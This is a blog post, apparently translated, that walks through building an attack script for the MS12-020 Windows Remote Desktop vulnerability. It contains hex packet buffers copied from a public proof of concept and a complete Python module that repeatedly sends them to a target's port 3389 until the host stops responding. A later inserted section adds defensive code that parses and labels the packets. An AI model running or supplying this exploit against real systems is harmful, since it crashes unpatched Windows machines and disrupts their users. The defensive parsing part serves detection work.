Building an MS12-020 Attack Script

  1. Foreword
  2. Main text

Foreword

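After coming back from the break I unexpectedly felt like writing an MS12-020 script, so I searched GitHub for code, read through it, and got the idea.
Damn, there's a parent-teacher meeting today too??? I'm done for = =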

Main text

MS12-020 security bulletin and the related patch: Microsoft Security Bulletin MS12-020 - Critical | Microsoft Docs
MS12-020 exp: MS12-020_POC/MS12-020_exploit.py at master · traceur/MS12-020_POC · GitHub

The shellcode taken from the link above:

buf="030000130ee000000000000100080000000000"
buf1="030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0"
buf2="0300000802f08028"

The full code:

import socket
import binascii
from secistsploit.core.exploit import *
from secistsploit.core.tcp.tcp_client import TCPClient


class Exploit(TCPClient):
    __info__ = {
        "name": "MS12-020_exploit",
        "description": "Origin of loopholes: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2012/ms12-020",
        "authors": (
            "demonsec",
        ),
        "references": (
             "www.ggsec.cn",
             "www.secist.com",
        ),

    }

    RHOSTS=OptIP("","Set RHOSTS IP")
    RPORT=OptPort(3389,"Set RHOSTS Port")
    def __init__(self):
        self.endianness = "<"
    def run(self):
        RHOSTS=(self.RHOSTS)
        RPORT=(self.RPORT)
        print('[+] RHOSTS:{}'.format(RHOSTS))
        print('[+] RPORT:{}'.format(RPORT))
        if RHOSTS!='' and RPORT!='':
            buf = binascii.unhexlify("030000130ee000000000000100080000000000")
            buf1 = binascii.unhexlify("030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0")
            buf2 = binascii.unhexlify("0300000802f08028")  # binascii.unhexlify turns the exp's hex strings into raw bytes
            shellcode = buf + buf1 + buf2  # concatenate the buffers in the order the exp uses


            while True:
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.connect((RHOSTS, RPORT))
                    s.sendall(shellcode)
                    rec = s.recv(1024)
                    s.close()
                    print('[^] Attack completion')
                except:
                    print('[+] Successed!')
                    exit()
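
Added example (not from the original post or the referenced PoC): each of the three buffers starts with a TPKT header (`03 00` plus a 16-bit length), so a defender can split a captured client-to-server byte stream into frames and label the RDP PDUs it contains. The first and last sample frames are the page's `buf` and `buf2`; the middle frame is a short constructed stand-in for `buf1`, and all function names are hypothetical.

```python
import struct

# X.224 TPDU codes (high nibble of the byte after the length indicator).
X224_CODES = {0xE0: "X.224 Connection Request", 0xD0: "X.224 Connection Confirm",
              0x80: "X.224 Disconnect Request", 0xF0: "X.224 Data"}


def split_tpkt(stream: bytes):
    """Yield TPKT frames: version 3, reserved byte, 16-bit big-endian total length."""
    offset = 0
    while offset < len(stream):
        if len(stream) - offset < 4:
            raise ValueError(f"truncated TPKT header at offset {offset}")
        version, _reserved, length = struct.unpack_from(">BBH", stream, offset)
        if version != 3:
            raise ValueError(f"not TPKT (version {version}) at offset {offset}")
        if length < 7 or offset + length > len(stream):
            raise ValueError(f"bad TPKT length {length} at offset {offset}")
        yield stream[offset:offset + length]
        offset += length


def describe(frame: bytes) -> str:
    """Label a frame by X.224 code and, for data TPDUs, the MCS PDU it carries."""
    li, code = frame[4], frame[5] & 0xF0
    label = X224_CODES.get(code, f"X.224 code 0x{code:02x}")
    if code != 0xF0:
        return label
    mcs = frame[5 + li:]  # payload follows the LI-counted X.224 header bytes
    if mcs[:2] == b"\x7f\x65":  # BER application tag 101
        return label + " / MCS Connect-Initial"
    if mcs and mcs[0] >> 2 == 10:  # PER choice index 10 in DomainMCSPDU
        return label + " / MCS Attach-User-Request"
    return label + " / other payload"


def summarize(stream: bytes):
    """Return (frame length, label) for every TPKT frame in the stream."""
    return [(len(f), describe(f)) for f in split_tpkt(stream)]


# First and last frames are buf and buf2 from the page; the middle frame is a
# constructed 10-byte stand-in for buf1 (same X.224 and MCS tag prefix, empty body).
CLIENT_STREAM = bytes.fromhex(
    "030000130ee000000000000100080000000000"
    "0300000a02f0807f6500"
    "0300000802f08028"
)

if __name__ == "__main__":
    for size, label in summarize(CLIENT_STREAM):
        print(f"{size:4d} bytes  {label}")
```

In the standard RDP connection sequence the client sends MCS Connect-Initial only after the server's X.224 Connection Confirm, so all three frames arriving in one client burst, as the single `sendall` above produces, is a useful triage signal.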

Test results:
[Screenshot: FkZLVA.md.jpg]

[Screenshot: FkZOUI.md.jpg]

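When reposting, please state: reposted from 422926799.github.io


Please credit the source when reposting. You are welcome to verify the sources cited in the article and to point out any errors or unclear wording.

Article title: Building an MS12-020 Attack Script

Author: 九世

Published: 2018-11-25, 08:40:44

Last updated: 2019-04-19, 20:36:16

Original link: http://422926799.github.io/posts/82b8ed8c.html

Copyright notice: "Attribution-NonCommercial-ShareAlike 4.0". Please keep the original link and author when reposting.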
